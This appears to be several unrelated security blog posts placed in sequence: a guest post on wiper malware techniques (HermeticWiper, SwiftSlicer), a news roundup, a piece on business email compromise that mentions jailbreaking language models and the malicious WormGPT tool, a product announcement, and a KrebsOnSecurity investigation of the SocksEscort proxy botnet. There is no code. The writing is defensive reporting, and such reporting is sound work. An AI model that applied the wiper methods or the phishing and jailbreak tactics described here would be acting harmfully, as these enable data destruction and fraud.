The Nightmare Of Destructive Malware | From Wiper To SwiftSlicer

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit their research to showcase their talents and bring their insights to a wider audience.

In today’s guest post, researcher Natacha Bakir (Senthorus/Cefcys) digs into the destructive world of wipers: a special class of malware that has neither espionage nor financial gain in mind, but exists solely to destroy data and disrupt the services provided by an organization to its consumers. From MeteorExpress to AcidRain and HermeticWiper, the current increase in the use of wipers since the start of Russia’s invasion of Ukraine has been unprecedented and is a subject worthy of greater attention.

In February 2022, Ukraine was targeted by a new malware named ‘HermeticWiper’. Amid reports of ransomware incidents increasing by 62% in 2021, and the number of ransomware attacks estimated at 236.1 million in the first half of 2022, this new malware, as sophisticated as it was, had a simple goal: to erase the target’s disks.

While wipers have been known for over 10 years, a significant rise in this destructive kind of malware has been noted since 2022. In this post, I will briefly discuss the history of wiper malware before focusing on the the techniques used in some of the most recent attacks.

History of Wipers

2012 was an important year for wipers. On August 15th, Shamoon wiped 30000 systems within a day. The New York Times estimated that 75% of the victim’s computers had been wiped. At the time, it was one of  the most destructive attacks ever seen. A group calling itself “Cutting Sword of Justice” claimed responsibility for the attack, blaming the al-Saud regime for crimes against humanity.

In 2015, an attack on the Ukraine Power grid caused a power outage for nearly a quarter of a million people. It was coordinated with a Denial-of-service attack on a call center to deny consumers up-to-date information on the blackout.

In 2022, WhisperGate wiper targeted multiple organizations in Ukraine. The wiper was later seen throughout the world.

Source: Trellix

The WhisperGate wiper had a decoy ransom note to mislead Incident Response teams. The wiper analyzes the victim’s environment enumerating OS attributes and disks to improve their access and gain the desired privileges to disarm the victim and attack.

In February 2022, HermeticWiper was dropped on victims via a compressed package, creating the EaseUS driver file, and enumerating the physical drives. The driver then loads and runs as a service. The driver is used through execution codes [dwIoControlCode] to overwrite the master boot record (MBR) and the master file table (MFT) before restarting the system.

In January 2023, ESET researchers uncovered a new wiper attack targeting Ukraine called SwiftSlicer. The wiper uses Active Directory Group Policy and is written in Go. ESET attributed this attack to Sandworm.

Wiper Techniques

Wipers primary goal is to destroy data. This can cause disruption and service outage affecting not just the organization targeted but entire populations. Wipers can also be deployed after an initial attack, in order to erase evidence. Although wipers can be disguised as ransomware and ask for a ransom, they don’t offer the capability to recover data and the goal is not financial gain, but rather a diversionary tactic while data is erased.

Depending on the hacker’s goal (discretion, speediness), several techniques of wiping are used, including:

  • enumerating the filesystem
  • overwriting the disks with other data like zero (0x00) bytes
  • corrupting MBR and MFT
  • fragmenting disks
  • using driver to gain kernel access
  • pass order through IOCTL DeviceIoControl() function.
HermeticWiper Architecture
HermeticWiper Architecture
Hermetic Wiper disassembly
Hermetic Wiper disassembly
SwiftSlicer disassembly

Given the simplicity of the goal, Wipers can be written in many different programming languages. Although SwiftSlicer is written in Go, similarities in the malware’s functionality can clearly be seen.

The Ukrainian CERT-UA reports that SwiftSlicer was distributed to network computers through GPO (Group Policy Object), the same method used to deploy most of the malware mentioned in this article.

They also noted that the malware targets the %CSIDL_SYSTEM_DRIVE%WindowsNTDS folder, showing that SwiftSlicer tries to destroy files and bring down the entire Windows domain.

SwiftSlicer targets Windows system drivers
SwiftSlicer targets Windows system drivers

Why Write a Wiper in Go?

Go is increasingly used in malware programming. With Go, malware developers can write code once and compile binaries from the same codebase for multiple platforms. As a result, they can target different operating systems like Unix, Linux, Windows and those that work on mobile.

In addition, Go programs can be difficult to analyze. The arguments are not passed through registers but are directly copied onto the stack at the correct position. Further, Go functions can have multiple return values, so static analysis is limited. Typically, when reversing go malware, analysts will need to use dynamic analysis, such as isolating interesting functions by name and using a debugger to break on interesting calls to inspect the program’s state.


Wiper malwares are not new, and even Russia’s use of them against Ukraine can be dated back to interference in the Ukraine Presidential Election of 2014. However, the extent of the use of wipers by Russian APT groups, especially Sandworm, against Ukrainian targets is something not seen previous to this conflict.

Whether used for sabotage or cyberwarfare, wipers cross the boundary of the virtual to the real, with the potential to wreak devastating effects on those far beyond the organization targeted.

The Good, the Bad and the Ugly in Cybersecurity – Week 30

The Good | SEC Says Cyber Incidents Must Be Disclosed Within 4 Days

The Securities and Exchange Commission has announced that it is adopting new rules that will require companies to disclose cyberattacks within four days.

In a press release on Wednesday, the SEC said the new rules require “registrants to disclose material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance.”

It is hoped prompt reporting will increase transparency for investors and potentially accelerate improvements in cyber defenses as details of breaches become more widely shared.

CISA announced new rules to report cyber incidents in 4 days

The new incident response rules require that publicly-traded companies reveal:

  • The date of discovery and status of the incident (ongoing or resolved)
  • A concise description of the incident’s nature and extent
  • Any data that may have been compromised, altered, accessed, or used without authorization
  • The impact of the incident on the company’s operations
  • Information about ongoing or completed remediation efforts by the company

Companies are not required to reveal specifics about their incident response plans or vulnerabilities such as zero days or n-days that could influence their response or remediation actions. The rules also allow for postponement of disclosure if it would pose “a significant risk to national security or public safety”. That determination is at the discretion of the US Attorney General.

Other caveats include allowing smaller companies an additional 180 days before they are required to provide Form 8-K disclosures. The rules, first proposed last year, are set to come into force in December.

The Bad | Millions of Cloud Container Workloads Vulnerable to New Ubuntu Bugs

Researchers this week disclosed two kernel-level vulnerabilities impacting, they say, up to 40% of Ubuntu cloud workloads. The bugs, dubbed ‘GameOver(lay), are said to be easy to exploit and allow for local privilege escalation.

The two flaws, CVE-2023-2640 and CVE-2023-32629, relate to the OverlayFS module in Ubuntu, a popular Linux filesystem widely used in cloud containers. OverlayFS is a file system commonly used with Docker that lays one filesystem on top of another. This allows users to modify the upper file system while keeping the base system intact, useful in cloud workloads where it is often desirable to provide an isolated layer for an application to run in that will not affect or modify the host system.

Researchers at Wiz discovered that Ubuntu’s modifications to OverlayFS make it possible to ‘trick’ the kernel into copying a privileged executable from one layer and writing it to another where it no longer requires privileges to execute.

Wiz discovers Ubuntu GameOverlay bug

Worse, the researchers say that exploits written in 2020 for a similar vulnerability will now work on any Ubuntu instance vulnerable to the two newly discovered flaws, providing local attackers with ready-made weapons.

Versions susceptible to the bugs range from Ubuntu 18.04 to 23.04. The researchers say that the number of releases available for Ubuntu make it challenging to determine all impacted versions, but a work-in-progress list is available here.

Ubunutu has issued patches for the vulnerabilities as of July 24th and admins are urged to update as soon as possible.

The Ugly | Federal Agencies Urged to Patch Actively Exploited Zero Day

CISA has this week told federal agencies to patch by August 15th a maximum severity bypass vulnerability found in Ivanti’s Endpoint Manager Mobile (EPMM) software, previously branded MobileIron Core. The warning comes after the bug was used to compromise twelve Norwegian government ministries.

EPMM is used by organizations to allow access to enterprise email and other applications on mobile devices. The zero-day vulnerability, patched this week and tagged as CVE-2023-35078, allows remote attackers to obtain Personally Identifiable Information (PII), add admin accounts, and make configuration changes through certain exposed API paths, which can be reached remotely without authentication.

It has been reported that there may be almost 3000 vulnerable instances of the software exposed on the public internet, with dozens belonging to U.S. local and state agencies. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog, noting that it poses a significant risk to the federal enterprise as malicious cyber actors are known to be exploiting the bug in the wild.

CISA’s warning to federal agencies should also be heeded by enterprise users of the EPMM/MobileIron Core software. Ivanti has released security patches and warned that all supported, unsupported and end-of-life releases are impacted. Users who cannot upgrade are urged to discontinue use of the product. A security advisory with further details is available to Ivanti customers.

Understanding the Evolution of Modern Business Email Compromise Attacks

Business email compromise (BEC) exploits the main common denominator found across every technology, tool, and process – the humans that interact with it. Taking advantage of human decision making habits and emotions, BEC has remained one of the most lucrative attack methods seen in today’s cyber threat landscape.

This May, the FBI issued a public warning against BEC schemes, which they described as being one of the most financially damaging online crimes, capitalizing on the fact that email communication remains a steadfast tool for modern businesses. In fact, recent reports show that the market for BEC is expected to grow from a value of $1.1 billion in 2022 to an estimated $2.8 billion by 2027.

Like with all methods of cyberattack, threat actors continue to develop the tools of their trade and iterate on their processes to become more cost effective, efficient, and profitable. BEC attacks have also evolved in the last few years to exploit new vulnerabilities and bypass traditional security measures. In this post, learn how these email-based attacks have evolved over the past two decades to adapt to changing security solutions, the latest tactics and techniques threat actors are using in current BEC scams, and ways to protect against them in the long run.

Emails From Nigerian Princes to High-Profile Attacks | How Business Email Compromise Has Evolved

In the early 2000s, the world saw some of the earliest phases of BEC scams take form. While the term “BEC” might not have been coined then, the fundamental elements in these attacks were already in motion. Early examples of social engineering tactics used in emails include:

  • The Nigerian Prince Scam – One of the earliest and most notorious forms of BEC attacks is the “Nigerian Prince” or “419 scam”. It began as early as the 1980s through postal mail but transitioned to email in the early 2000s. Scammers claimed to be Nigerian princes or government officials seeking assistance to transfer a large sum of money out of their country. They promised to share the fortune with the recipient in return for a small fee to cover legal or administrative costs. This classic scam capitalized on people’s greed and willingness to believe in unlikely windfalls.
  • Lottery and Inheritance Scams – Similar to the Nigerian Prince scam, these earlier forms of BEC attacks involved emails informing recipients that they had won a lottery or inherited a large sum of money from a distant relative. To claim the prize or inheritance, victims were asked to provide personal information or pay a fee upfront, leading to identity theft and financial loss.
  • Overpayment Scams – In these attacks, scammers posed as potential customers or clients and contacted businesses regarding purchasing their products or services. They would then send a check or make a payment for an amount higher than the agreed-upon price and request the excess to be refunded. The initial payment would later bounce or be canceled, leaving the business out of pocket.
  • Executive Impersonation – Early instances of executive impersonation involved scammers pretending to be high-ranking executives or business partners within an organization. They would instruct employees to perform certain tasks, such as transferring funds or sharing sensitive information, under the guise of confidentiality or urgency.

Early BEC scams were relatively simple and didn’t require sophisticated techniques from cyber criminals to launch successful attacks. Seeing how profitable these scams were and how easily they could be tailored to targeted higher profile targets, BEC attacks soon expanded to affect every industry vertical. According to the IC3, BEC fraud now costs global businesses just over $50 billion dollars with reports of scams reported in all 50 states and in 177 countries. The IC3 has also classified the threat of BEC as one of the leading categories of cybercrime by financial losses.

Macro socio-economic trends have also fostered an environment where modern BEC scams thrive. Since the COVID-19 pandemic, more workplaces and individuals conduct their business virtually, creating additional avenues of attack for BEC scammers. Rising use of cryptocurrency now also plays a role in the BEC, specifically in investment scams.

Right now, experts say that the number of emails sent per day is projected to increase to over 370 billion by 2025. Whether used for personal and business communication or to support massive e-commerce and e-marketing industries, emails are clear targets in modern malware campaigns, advanced persistent threats (APTs), phishing attacks, identity theft, and more.

Current Top Trends In Business Email Compromise Attacks

Today’s world is saturated by connection with billions of internet-connected devices linking everyone and everything together at all hours of the day. Considering global collaboration, smart mobile devices, and the accessibility provided by cloud technologies, emails are still the one, simple way to reach many at once making BEC attacks as relevant as ever.

As technology has advanced, BEC scammers have also furthered their craft. Many BEC scams are now much more sophisticated, involving multi-stage attacks and misuse of artificial intelligence (AI) and machine learning (ML) along with targeting more attractive groups such as vendors, big banks, and government entities. This section explores some of the top trends found in recent BEC attacks that enterprises need to stay alert for.

Multi-Stage AiTM & BEC Attacks

Security professionals are seeing multi-stage, adversary-in-the-middle (AiTM) phishing and business email compromise (BEC) attacks against financial institutions and large banks. In these types of campaigns, threat actors seek to exploit trusted relationships between partnered organizations to bypass multi-factor authentication (MFA) measures.

Attacks like these feature a complex combination of both AiTM and BEC tactics to abuse the relationship between vendors, suppliers, and enterprise partners in order to commit financial fraud. After using AiTM phishing to bypass MFA mechanisms, threat actors connect to and take over their victim’s account, resetting authentication methods to devices under their control and creating new email rules to send out malicious emails to the next layer of victims in the attack chain.

The Use of Black Hat AI Tools In BEC Attacks

After a dramatic entrance in late 2022, ChatGPT and other generative AI tools are now being misused by cyber criminals to create improved spoof content for malicious emails and sites. Most recently, a black hat generative AI tool called WormGPT has caught the attention of cyber attackers who are using it to make their fake emails sound more convincing, personalized to the intended victim, and error-free; all to reduce the likelihood of being flagged as suspicious.

Though companies like OpenAI have strict disclaimers against the use of their software for illegal actions, researchers and hackers are now jailbreaking the language models to get around safety rules. In the case of WormGPT, this tool is designed specifically for malicious activities and first seen circulating in darknet forums. Such spin off AI tools are making BEC attacks more accessible by lowering the entry threshold to a wider spectrum of cybercriminals.

“Second Hop” Crypto-Based BEC Attacks

There are two variations of BEC scams involving cryptocurrency: direct transfers to a crypto exchange (CE) that is similar to traditional BEC models, and ‘second hop’ transfers. In the latter, victims are hit with social engineering tactics to give up personal identifiable information (PII). Threat actors then use the stolen information to open new cryptocurrency wallets in the victim’s name and then proceed to reroute the money and cash out. In both variations, victims are unaware that the funds being sent are converted to cryptocurrency.

Avoiding “Impossible Travel” Flags With Local IP Addresses

To increase the chances of a successful email-based intrusion, threat actors are attempting to bypass “impossible travel” flags by purchasing IP addresses that correspond to the locations of their victims. Impossible travel flags are security mechanisms that detect and alert when a user’s account is accessed from two different geographical locations within a short period, which is seen as a key indicator of unauthorized access. Using this tactic, threat actors are able to avoid detection and more easily create backdoors in the compromised system.

Timing BEC Campaigns With Summer Vacations

New research has shed light on the quick rise of BEC attacks across Europe, illustrating that European organizations were seeing a greater volume and frequency of such attacks compared to their U.S. counterparts. Between June 2022 and May 2023, researchers found that European organizations were attacked an average of 10 times per 1000 mailboxes, and especially in the month of August, when most Europeans tend to schedule their annual holiday.

Exploiting this cultural difference in vacation preferences, threat actors were found to be focusing their efforts on European businesses that would be operating with less-than-usual staff. Given the high concentration of employees being away on vacation, attackers could increase their chances of success by taking advantage of people being away from their computers as well as those who were likely more distracted during the ‘slower’ month.

BEC Is Extending Past Traditional Platforms

The FBI have warned about BEC scammers expanding their tactics beyond conventional platforms by taking advantage of the shift to remote work during and post-pandemic. Traditionally, social engineering relied on phone and email exchanges, but now, virtual meeting platforms have become the new grounds for attack.

First, the attacker gains access to a senior leader’s email account, typically a C-suite or member of the Board, and uses it to arrange virtual meetings with employees. During the meeting, the scammer displays a static image of the senior leader or uses deep fake audio to claim technical difficulties. Finally, the scammer instructs employees to transfer funds to fraudulent bank accounts.

How XDR Tackles The Challenge of Email Security Risks

Businesses often deploy individualized security solutions for their email defenses, causing visibility gaps and incomplete risk understanding. In such cases, manual intervention to address suspicious emails becomes not just time-consuming but also advantageous for cybercriminals.

That’s where Extended Detection and Response (XDR) comes in. Unlike isolated solutions, XDR, when coupled with email security, offers comprehensive threat detection and response. It doesn’t merely focus on endpoint activity but delves into the context of malware delivery.

XDR solutions, like vigilant cyber detectives, spot suspicious activities across attack surfaces and provide detailed incident reports. Integration with email security enables better understanding of attack vectors and potential threat actors, and allows for faster, automated responses to compromised user accounts.

SentinelOne has invested to fulfil the potential of XDR solutions, investing in comprehensive platforms like Singularity. The fusion of XDR into our cybersecurity strategies is indeed becoming the new norm for tackling evolving digital threats.


The steady rise of BEC attacks in recent years highlights the evolving sophistication of cybercriminals and the need for businesses to stay vigilant in safeguarding their assets and sensitive information. As these attacks continue to surge, it’s essential for organizations to understand the evolving tactics used by threat actors as well as the potential vulnerabilities within their email platforms.

Given the ever-changing threat landscape, businesses are looking farther ahead than just implementing defensive measures like multi-factor authentication, email authentication protocols, secure email gateways, and strong password policies. This is where XDR capabilities emerge as a critical part of a stronger cyber strategy.

As businesses navigate evolving threat tactics and techniques, adopting a multi-dimensional security strategy that combines robust preventive measures with XDR capabilities becomes a vital one. To learn more about how Singularity XDR is able to provide businesses with an effective strategy against increasingly sophisticated BEC risks, book a demo or contact us today.

SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response. Discover the power of autonomous with Singularity XDR.

Announcing AI-Powered Threat Detection for NetApp

SentinelOne is pleased to announce general availability (GA) of Threat Detection for NetApp. Part of the new Singularity™ Cloud Data Security product line, this novel security solution applies SentinelOne’s proprietary AI models to scan files and detect malware stored on NetApp arrays, stopping its spread before it begins. Supported as part of the NetApp Partner Connect Program, Threat Detection for NetApp delivers high-performance inline file scans complete in milliseconds for an optimal, low latency user experience.

This blog post explores the key benefits of this solution and how it improves risk management, reduces recovery costs, and helps businesses meet compliance requirements. It also covers initial steps for setting up Threat Detection for NetApp.

NetApp for AI-powered threat detection

Disrupting the Storage Security Market

Considering the volume of vital data hosted in networked storage and the number of users with access from endpoints running various operating systems (OSs) and from every corner of an enterprise, a single malicious file can quickly spread across an organization. Absent a security solution, users could unwittingly access and spread the malware such that it resurfaces repeatedly.

With Threat Detection for NetApp, businesses can minimize these unnecessary recovery costs. In addition, compliance regulations typically require that the organization use a security solution to protect their means of storage. The solution is designed to address customer’s most underserved pain points and focuses on the following key features:

  • Uncompromising security. Reliance on signatures renders organizations vulnerable. Therefore, our solution must deliver the best protection available against novel and unknown malware.
  • High speed performance. Low latency is key to a good user experience. To this point, NetApp invests heavily in performance optimization for a streamlined customer experience.
  • Easy management. Administration must be simple. Deployment and configuration must be done once. Existing SentinelOne customers expressed strong interest in a “familiar feel” to the existing management console.
Threat Detection for NetApp: AI-Powered Cloud Data Security

NetApp uses a dedicated OS for their filers, ONTAP, so traditional endpoint agents are incompatible. This is why storage vendors provide a dedicated protocol for security solutions. Conformance to this protocol increases barriers to market entry, and so legacy solutions have dominated an underserved market for years. Innovation waned, even as threat actors evolved.

Legacy solutions to filer security are insufficient for many reasons:

  1. They rely upon AV signatures which are easily evaded.
  2. Frequent signature updates are an administrative nightmare.
  3. Poor scanning performance negatively impacts user experience when accessing the filer.
  4. Legacy solutions often require a separate security management console, further increasing administrative overhead.
  5. They often lack features to facilitate management, ease of use, and visibility.

Setup & Configuration

Threat Detection for NetApp communicates directly with the SentinelOne management console. Unlike alternative endpoint security solutions, SentinelOne allows customers to manage storage security alongside the rest of their user endpoints and cloud workloads and achieve a seamless, intuitive security management experience without the administrative overhead of additional console components. No learning curve is required.

Initial setup of Threat Detection for NetApp assumes familiarity with NetApp network management concepts such as Vscan, logical interface (LIF), and storage virtual machine (SVM). For more details, consult the NetApp ONTAP documentation and work closely with a NetApp system administrator.

To get started, an administrator first downloads and runs the latest Threat Detection for NetApp Installer package to the Windows Vscan server having the NetApp ONTAP Connector. Upon running the installer, enter the Site or Group Token when prompted. User credentials must have local admin privileges.

High Performance, Streamlined Administration

Along with the other solutions within the Singularity Platform, Threat Detection for NetApp combines high performance with intuitive administration. From threats and mitigation actions, to exclusions, blocklists, agent management and more, Singularity users can expect the same trusted capabilities that now support NetApp storage arrays too. To help save time, Threat Detection for NetApp respects existing user block lists or exclusions that are already configured, removing the burden of rebuilding them again.

In addition to existing management features, the solution also provides valuable threat metadata for greater insights and analysis. For example, metadata points to the exact endpoint which copied the malicious file to your storage.  It doesn’t matter if that endpoint is unprotected or outside your organization; if it found its way to NetApp storage, SentinelOne will point to it.

Customers can also configure policies to automate how Threat Detection for NetApp responds to threats. That is, configuring the agent policies for Detect Mode or Protect Mode. In the following example, the agent is configured to respond to both Suspicious and Malicious Threats as categorized by the agent’s onboard AI models in Protect Mode. Upon detecting a threat, the agent will automatically quarantine any suspicious or malicious files. Customers are in complete control of their security policy choices, configuring the automation level that works best for their specific use cases.

Two Protection Mode Policies: Detect and Protect

The below GIF shows the agent in action. A user attempts to upload 3 executable files from a Windows pane on the left to a NetApp volume on the right. For illustrative purposes, the files are simply named benign.exe, malicious.exe, and malicious2.exe. The user copies the 3 files, and drops them simultaneously to the protected volume. Upon refresh of the Windows pane on the right, the only remaining file is benign.exe. Both of the malicious files were automatically quarantined in real time, without any human intervention required to detect or stop the spread.

The following image shows what the threat detection and response would look like in the SentinelOne console for the file malicious2.exe. The agent’s AI assigns a confidence level of ‘Malicious’ and automatically encrypts and moves the file to a predefined quarantine folder.

Threat Detection & Mitigation Event in the SentinelOne Console

Should security personnel wish to conduct further analysis, downloading the malicious file is straightforward from within the management console as shown.

1-Click File Fetch

Analysts can just as easily unquarantine files with a single click in the console via Actions > Unquarantine. This will return the file to its original location and remove its associated quarantine restrictions. Should the analyst choose, they can just as easily add an Exclusion to prevent scanning of this file in the future via Actions > Add To Exclusions.

1-Click Quarantine
1-Click Exclusion

Uncompromising Cloud Data Security Performance

As storage vendors invest millions of dollars to save every possible millisecond, Threat Detection for NetApp was built with special attention to performance. Rigorous third-party testing benchmarks and validates this, ensuring that the solution can complete a file scan operation within milliseconds to achieve an optimal, low-latency user experience that does not compromise on security. Since file scanning is inline, a file will not be released to the user until the file scan has completed. Even customers that have an extremely busy filer can set up a scanner pool with multiple scanners and maintain high performance levels.


With the launch of the Cloud Data Security product line, SentinelOne customers can now seamlessly manage cloud data security alongside user endpoints, cloud workloads, and identity. With Threat Detection for NetApp, malware can no longer hide on file storage.

Unlike lesser alternatives, Threat Detection for NetApp goes beyond signature-based AV that is easily evaded, and uses the power of AI to examine files and protect organizations from advanced threats. From a single management console, machine-speed performance, and autonomous mitigation, SentinelOne continues to deliver adaptive cybersecurity across hybrid cloud footprints.

To learn more about Threat Detection for NetApp, the SentinelOne Singularity Platform, or to request a demo, contact us today.

Who and What is Behind the Malware Proxy Service SocksEscort?

Researchers this month uncovered a two-year-old Linux-based remote access trojan dubbed AVrecon that enslaves Internet routers into botnet that bilks online advertisers and performs password-spraying attacks. Now new findings reveal that AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hacked residential and small business devices to cybercriminals looking to hide their true location online.

Image: Lumen’s Black Lotus Labs.

In a report released July 12, researchers at Lumen’s Black Lotus Labs called the AVrecon botnet “one of the largest botnets targeting small-office/home-office (SOHO) routers seen in recent history,” and a crime machine that has largely evaded public attention since first being spotted in mid-2021.

“The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying and ad fraud,” the Lumen researchers wrote.

Malware-based anonymity networks are a major source of unwanted and malicious web traffic directed at online retailers, Internet service providers (ISPs), social networks, email providers and financial institutions. And a great many of these “proxy” networks are marketed primarily to cybercriminals seeking to anonymize their traffic by routing it through an infected PC, router or mobile device.

Proxy services can be used in a legitimate manner for several business purposes — such as price comparisons or sales intelligence — but they are massively abused for hiding cybercrime activity because they make it difficult to trace malicious traffic to its original source. Proxy services also let users appear to be getting online from nearly anywhere in the world, which is useful if you’re a cybercriminal who is trying to impersonate someone from a specific place., a startup that tracks proxy services, told KrebsOnSecurity that the Internet addresses Lumen tagged as the AVrecon botnet’s “Command and Control” (C2) servers all tie back to a long-running proxy service called SocksEscort.

SocksEscort[.]com, is what’s known as a “SOCKS Proxy” service. The SOCKS (or SOCKS5) protocol allows Internet users to channel their Web traffic through a proxy server, which then passes the information on to the intended destination. From a website’s perspective, the traffic of the proxy network customer appears to originate from a rented/malware-infected PC tied to a residential ISP customer, not from the proxy service customer.

The SocksEscort home page says its services are perfect for people involved in automated online activity that often results in IP addresses getting blocked or banned, such as Craigslist and dating scams, search engine results manipulation, and online surveys.

Spur tracks SocksEscort as a malware-based proxy offering, which means the machines doing the proxying of traffic for SocksEscort customers have been infected with malicious software that turns them into a traffic relay. Usually, these users have no idea their systems are compromised.

Spur says the SocksEscort proxy service requires customers to install a Windows based application in order to access a pool of more than 10,000 hacked devices worldwide.

“We created a fingerprint to identify the call-back infrastructure for SocksEscort proxies,” Spur co-founder Riley Kilmer said. “Looking at network telemetry, we were able to confirm that we saw victims talking back to it on various ports.”

According to Kilmer, AVrecon is the malware that gives SocksEscort its proxies.

“When Lumen released their report and IOCs [indicators of compromise], we queried our system for which proxy service call-back infrastructure overlapped with their IOCs,” Kilmer continued. “The second stage C2s they identified were the same as the IPs we labeled for SocksEscort.”

Lumen’s research team said the purpose of AVrecon appears to be stealing bandwidth – without impacting end-users – in order to create a residential proxy service to help launder malicious activity and avoid attracting the same level of attention from Tor-hidden services or commercially available VPN services.

“This class of cybercrime activity threat may evade detection because it is less likely than a crypto-miner to be noticed by the owner, and it is unlikely to warrant the volume of abuse complaints that internet-wide brute-forcing and DDoS-based botnets typically draw,” Lumen’s Black Lotus researchers wrote.

Preserving bandwidth for both customers and victims was a primary concern for SocksEscort in July 2022, when 911S5 — at the time the world’s largest known malware proxy network — got hacked and imploded just days after being exposed in a story here. Kilmer said after 911’s demise, SocksEscort closed its registration for several months to prevent an influx of new users from swamping the service.

Danny Adamitis, principal information security researcher at Lumen and co-author of the report on AVrecon, confirmed Kilmer’s findings, saying the C2 data matched up with what Spur was seeing for SocksEscort dating back to September 2022.

Adamitis said that on July 13 — the day after Lumen published research on AVrecon and started blocking any traffic to the malware’s control servers — the people responsible for maintaining the botnet reacted quickly to transition infected systems over to a new command and control infrastructure.

“They were clearly reacting and trying to maintain control over components of the botnet,” Adamitis said. “Probably, they wanted to keep that revenue stream going.”

Frustratingly, Lumen was not able to determine how the SOHO devices were being infected with AVrecon. Some possible avenues of infection include exploiting weak or default administrative credentials on routers, and outdated, insecure firmware that has known, exploitable security vulnerabilities.


KrebsOnSecurity briefly visited SocksEscort last year and promised a follow-up on the history and possible identity of its proprietors. A review of the earliest posts about this service on Russian cybercrime forums suggests the 12-year-old malware proxy network is tied to a Moldovan company that also offers VPN software on the Apple Store and elsewhere.

SocksEscort began in 2009 as “super-socks[.]com,” a Russian-language service that sold access to thousands of compromised PCs that could be used to proxy traffic. Someone who picked the nicknames “SSC” and “super-socks” and email address “” registered on multiple cybercrime forums and began promoting the proxy service.

According to, the apparently related email address “” was used to register SocksEscort[.]com, super-socks[.]com, and a few other proxy-related domains, including ip-score[.]com, segate[.]org seproxysoft[.]com, and vipssc[.]us. Cached versions of both super-socks[.]com and vipssc[.]us show these sites sold the same proxy service, and both displayed the letters “SSC” prominently at the top of their homepages.

Image: Page translation from Russian via Google Translate.

According to cyber intelligence firm Intel 471, the very first “SSC” identity registered on the cybercrime forums happened in 2009 at the Russian language hacker community Antichat, where SSC registered using the email address SSC asked fellow forum members for help in testing the security of a website they claimed was theirs: myiptest[.]com, which promised to tell visitors whether their proxy address was included on any security or anti-spam block lists.

DomainTools says myiptest[.]com was registered in 2008 to an Adrian Crismaru from Chisinau, Moldova. Myiptest[.]com is no longer responding, but a cached copy of it from shows that for about four years it included in its HTML source a Google Analytics code of US-2665744, which was also present on more than a dozen other websites.

Most of the sites that once bore that Google tracking code are no longer online, but nearly all of them centered around services that were similar to myiptest[.]com, such as abuseipdb[.]com, bestiptest[.]com, checkdnslbl[.]com, dnsbltools[.]com and dnsblmonitor[.]com.

Each of these services were designed to help visitors quickly determine whether the Internet address they were visiting the site from was listed by any security firms as spammy, malicious or phishous. In other words, these services were designed so that proxy service users could easily tell if their rented Internet address was still safe to use for online fraud.

Another domain with the Google Analytics code US-2665744 was sscompany[.]net. An archived copy of the site says SSC stands for “Server Support Company,” which advertised outsourced solutions for technical support and server administration. The company was located in Chisinau, Moldova and owned by Adrian Crismaru.

Leaked copies of the hacked Antichat forum indicate the SSC identity tied to registered on the forum using the IP address That same IP was used to register the nickname “Deem3n®,” a prolific poster on Antichat between 2005 and 2009 who served as a moderator on the forum.

There was a Deem3n® user on the webmaster forum whose signature in their posts says they run a popular community catering to programmers in Moldova called sysadmin[.]md, and that they were a systems administrator for sscompany[.]net.

That same Google Analytics code is also now present on the homepages of wiremo[.]co and a VPN provider called HideIPVPN[.]com.

Wiremo sells software and services to help website owners better manage their customer reviews. Wiremo’s Contact Us page lists a “Server Management LLC” in Wilmington, DE as the parent company. Records from the Delaware Secretary of State indicate Crismaru is CEO of this company.

Server Management LLC is currently listed in Apple’s App Store as the owner of a “free” VPN app called HideIPVPN. The contact information on Crismaru’s LinkedIn page says his company websites include myiptest[.]com, sscompany[.]net, and hideipvpn[.]com.

“The best way to secure the transmissions of your mobile device is VPN,” reads HideIPVPN’s description on the Apple Store. “Now, we provide you with an even easier way to connect to our VPN servers. We will hide your IP address, encrypt all your traffic, secure all your sensitive information (passwords, mail credit card details, etc.) form [sic] hackers on public networks.”

Mr. Crismaru did not respond to multiple requests for comment. When asked about the company’s apparent connection to SocksEscort, Wiremo responded, “We do not control this domain and no one from our team is connected to this domain.” Wiremo did not respond when presented with the findings in this report.

Russia Sends Cybersecurity CEO to Jail for 14 Years

The Russian government today handed down a treason conviction and 14-year prison sentence on Iyla Sachkov, the former founder and CEO of one of Russia’s largest cybersecurity firms. Sachkov, 37, has been detained for nearly two years under charges that the Kremlin has kept classified and hidden from public view, and he joins a growing roster of former Russian cybercrime fighters who are now serving hard time for farcical treason convictions.

Ilya Sachkov. Image:

In 2003, Sachkov founded Group-IB, a cybersecurity and digital forensics company that quickly earned a reputation for exposing and disrupting large-scale cybercrime operations, including quite a few that were based in Russia and stealing from Russian companies and citizens.

In September 2021, the Kremlin issued treason charges against Sachkov, although it has refused to disclose any details about the allegations. Sachkov pleaded not guilty. After a three-week “trial” that was closed to the public, Sachkov was convicted of treason and sentenced to 14 years in prison. Prosecutors had asked for 18 years.

Group-IB relocated its headquarters to Singapore several years ago, although it did not fully exit the Russian market until April 2023. In a statement, Group-IB said that during their founder’s detainment, he was denied the right to communicate — no calls, no letters — with the outside world for the first few months, and was deprived of any visits from family and friends.

“Ultimately, Ilya has been denied a chance for an impartial trial,” reads a blog post on the company’s site. “All the materials of the case are kept classified, and all hearings were held in complete secrecy with no public scrutiny. As a result, we might never know the pretext for his conviction.”

Prior to his arrest in 2021, Sachkov publicly chastised the Kremlin for turning a blind eye to the epidemic of ransomware attacks coming from Russia. In a speech covered by the Financial Times in 2021, Sachkov railed against the likes of Russian hacker Maksim Yakubets, the accused head of a hacking group called Evil Corp. that U.S. officials say has stolen hundreds of millions of dollars over the past decade.

“Yakubets has been spotted driving around Moscow in a fluorescent camouflage Lamborghini, with a custom licence plate that reads ‘THIEF,’” FT’s Max Seddon wrote. “He also ‘provides direct assistance to the Russian government’s malicious cyber efforts,’ according to US Treasury sanctions against him.”

In December 2021, Bloomberg reported that Sachkov was alleged to have given the United States information about the Russian “Fancy Bear” operation that sought to influence the 2016 U.S. election. Fancy Bear is one of several names (e.g., APT28) for an advanced Russian cyber espionage group that has been linked to the Russian military intelligence agency GRU.

